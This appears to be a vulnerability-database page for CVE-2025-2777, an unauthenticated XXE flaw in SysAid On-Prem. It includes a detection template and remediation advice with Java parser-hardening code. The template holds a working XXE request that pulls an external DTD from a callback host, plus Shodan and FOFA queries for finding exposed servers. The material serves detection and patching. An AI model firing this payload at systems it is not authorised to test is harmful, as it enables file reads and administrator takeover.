
SysAid On-Prem <= 23.3.40 - XML External Entity

CVE-2025-2777
Verified

Description

SysAid On-Prem versions <= 23.3.40 contain an unauthenticated XML External Entity (XXE) vulnerability in the lshw processing functionality, allowing administrator account takeover and file read primitives.

Severity

Critical

CVSS Score

9.3

Exploit Probability

23%

Affected Product

sysaid

Published Date

May 10, 2025

Template Author

johnk3r

CVE-2025-2777.yaml
id: CVE-2025-2777

info:
  name: SysAid On-Prem <= 23.3.40 - XML External Entity
  author: johnk3r
  severity: critical
  description: |
    SysAid On-Prem versions <= 23.3.40 are vulnerable to an unauthenticated XML External Entity (XXE) vulnerability in the lshw processing functionality, allowing for administrator account takeover and file read primitives.
  impact: |
    Unauthenticated attackers can exploit XXE vulnerabilities in the lshw endpoint to read arbitrary files, potentially leading to administrator account takeover and complete system compromise.
  remediation: |
    Upgrade to SysAid On-Prem version 24.40.60 or later that properly disables external entity processing.
  reference:
    - https://labs.watchtowr.com/sysowned-your-friendly-rce-support-ticket/
    - https://documentation.sysaid.com/docs/24-40-60
  classification:
    epss-score: 0.23107
    epss-percentile: 0.96003
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:L
    cvss-score: 9.3
    cve-id: CVE-2025-2777
    cwe-id: CWE-611
  metadata:
    max-request: 1
    vendor: sysaid
    product: sysaid
    shodan-query: http.favicon.hash:"1540720428"
    fofa-query: icon_hash=1540720428
  tags: cve,cve2025,oast,sysaid,xxe,vkev,vuln

variables:
  filename: "{{to_lower(rand_text_alpha(5))}}"

http:
  - raw:
      - |
        POST /lshw?osVer=a&osCode=b&osKernel=c&agentVersion=e&serial=f HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/xml

        <?xml version="1.0" ?>
        <!DOCTYPE foo [
        <!ENTITY % foo SYSTEM "http://{{interactsh-url}}/{{filename}}.dtd">
        %foo;
        ]>

    matchers-condition: and
    matchers:
      - type: word
        part: interactsh_protocol
        words:
          - "http"

      - type: word
        part: interactsh_request
        words:
          - "User-Agent: Java"
# digest: 490a004630440220136172ea51a12c6b2888305246b401978814c6566688323f96b4db516abe207b02203ea0b918c95f3b749e80402f47bc193647011740dd28da3cd25d4d9a06a56a8b:922c64590222798bb761d5b6d8e72950
Score

9.3

CVSS Metrics

CVSS Vector:
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:L
CVE ID:
CVE-2025-2777
CWE ID:
CWE-611

References

https://labs.watchtowr.com/sysowned-your-friendly-rce-support-ticket/
https://documentation.sysaid.com/docs/24-40-60

Remediation Steps

Upgrade to SysAid On-Prem version 24.40.60 or later, which properly disables external entity processing.
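The fix amounts to disabling DTD and external entity processing in the XML parser that handles the request body. As an added illustration (not SysAid's code and not part of this template), the following Java shows the unsafe default `DocumentBuilderFactory` beside a hardened one, checked against a constructed copy of the template's probe with a placeholder host; Java is assumed because the template matches on `User-Agent: Java`. The probe uses a parameter entity (`%foo;`), so turning off external general entities alone would not stop it.

```java
import javax.xml.parsers.DocumentBuilder;
import javax.xml.parsers.DocumentBuilderFactory;
import javax.xml.parsers.ParserConfigurationException;
import org.xml.sax.InputSource;
import org.xml.sax.SAXException;
import java.io.IOException;
import java.io.StringReader;

public class XxeHardening {
    // Constructed test input: same shape as the template's probe, with a
    // placeholder host instead of an OAST callback, plus a root element.
    static final String PROBE =
        "<?xml version=\"1.0\" ?>\n"
        + "<!DOCTYPE foo [\n"
        + "<!ENTITY % foo SYSTEM \"http://oast.placeholder.invalid/x.dtd\">\n"
        + "%foo;\n"
        + "]>\n"
        + "<foo/>";

    // Weak default for contrast: a bare DocumentBuilderFactory.newInstance()
    // processes the DTD, so %foo; triggers an outbound fetch of the remote DTD.
    static DocumentBuilder weakBuilder() throws ParserConfigurationException {
        return DocumentBuilderFactory.newInstance().newDocumentBuilder();
    }
    // Hardened: refuse any DOCTYPE, which stops this payload outright. The rest
    // is defence in depth; note that turning off general entities alone would
    // not stop a parameter entity such as %foo;.
    static DocumentBuilder hardenedBuilder() throws ParserConfigurationException {
        DocumentBuilderFactory f = DocumentBuilderFactory.newInstance();
        f.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
        f.setFeature("http://xml.org/sax/features/external-general-entities", false);
        f.setFeature("http://xml.org/sax/features/external-parameter-entities", false);
        f.setFeature("http://apache.org/xml/features/nonvalidating/load-external-dtd", false);
        f.setXIncludeAware(false);
        f.setExpandEntityReferences(false);
        return f.newDocumentBuilder();
    }

    // True only when the parser itself rejects the probe; an IOException is
    // deliberately not caught, since it would mean a fetch was attempted.
    static boolean rejectsProbe(DocumentBuilder b) throws IOException {
        try { b.parse(new InputSource(new StringReader(PROBE))); return false; }
        catch (SAXException e) { return true; }
    }

    public static void main(String[] args) throws Exception {
        System.out.println("hardened parser rejects probe: " + rejectsProbe(hardenedBuilder()));
    }
}
```

Running `rejectsProbe(weakBuilder())` instead would attempt the outbound DTD fetch, which is exactly the behaviour the template's OAST matchers detect.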